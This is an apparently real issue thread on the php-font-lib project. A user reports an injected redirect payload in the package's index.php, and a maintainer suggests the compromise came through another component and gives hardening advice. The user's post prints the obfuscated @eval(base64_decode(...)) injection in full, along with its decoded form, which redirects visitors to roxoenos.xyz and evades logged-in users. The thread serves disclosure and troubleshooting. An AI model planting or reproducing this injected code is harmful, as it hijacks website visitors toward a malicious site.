malware injected into index.php

[kdavidfong]

I use php-font-lib as a part of dompdf in my Laravel project. Recently I was experiencing a number of redirects to an outside website "allowandgo.com" which asked for permissions and seem to be some sort of malware. Eventually it started influencing some Axios requests and preventing them from completing. I was able to trace the issue all the way back to the /vendor/phenx/php-font-lib/index.php

this is the modified code I found.

<?php /*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/ header("Location: www/"); ?>

I used this site to decode it and received this result.

    if(!defined("chaeJou7")){
            define("chaeJou7", 1);
            function isMobile($uagentStr){
                if(strpos($uagentStr, 'android') !== false || strpos($uagentStr, 'blackberry') !== false
                    || strpos($uagentStr, 'iphone') !== false || strpos($uagentStr, 'ipad') !== false
                    || strpos($uagentStr, 'ipod') !== false || strpos($uagentStr, 'opera mini') !== false
                    || strpos($uagentStr, 'ieMobile') !== false){
                    return true;
                }
                return false;
            }

            function isDesktop($uagentStr){
                if(strpos($uagentStr, 'edge') !== false || strpos($uagentStr, 'msie') !== false
                    || strpos($uagentStr, 'opr') !== false || strpos($uagentStr, 'chromium') !== false
                    || strpos($uagentStr, 'firefox') !== false || strpos($uagentStr, 'chrome') !== false){
                    return true;
                }
                return false;
            }

            $redirTo = "https://www.roxoenos.xyz/";
            $checkCookRedirStr = "aeNee8pi";
            $redirectAllow = true;
            foreach ($_COOKIE as $cookKey=>$cookVal){
                if (strpos($cookKey, 'wordpress_logged_in') !== false || $cookKey == $checkCookRedirStr) {
                    $redirectAllow = false;
                    break;
                }
            }

            $uagent = strtolower($_SERVER['HTTP_USER_AGENT']);

            if ($redirectAllow){
                if(isMobile($uagent) || isDesktop($uagent)) {
                    setcookie($checkCookRedirStr, "1", time() + 604800);
                    header("Location: $redirTo");
                    die;
                }
            }
     }

I had discovered cookies with the same name "aeNee9pi" attached to my web address in my browser as well as "roxoenos.xyz" in my errored axios requests so I am pretty sure this is the heart of the issue. I have since removed the infected code and restored things to there defaults but wasn't sure where to post this error. I thought this might be the best place as it made it into my /vendor/ folder.

[bsweeney]

I'm not sure there's a lot we can do in response to this issue. This doesn't look like an exploit performed against php-font-lib, based on the info you've provided. Yes, php-font-lib is being used to drive this redirect logic, but it's likely that the actual exploit was performed against some other system component and the offending logic was inserted into that php-font-lib file. In which case there's a likelihood that you may find similar code in other PHP scripts (or not, depending on how targetted this was).

First suggestion would be to move the vendor directory to somewhere not web accessible. Also, if you can run a security scan against your system that would be a good idea. Also make sure you're following security best practices for your various packages. For example, I see some versions of Laravel are exploitable if debug mode is enabled.

If you find anything more specific to php-font-lib please follow up.

[kdavidfong]

Ok, thank you for the suggestions and input! Wasn't sure where else to post this. I will close this issue.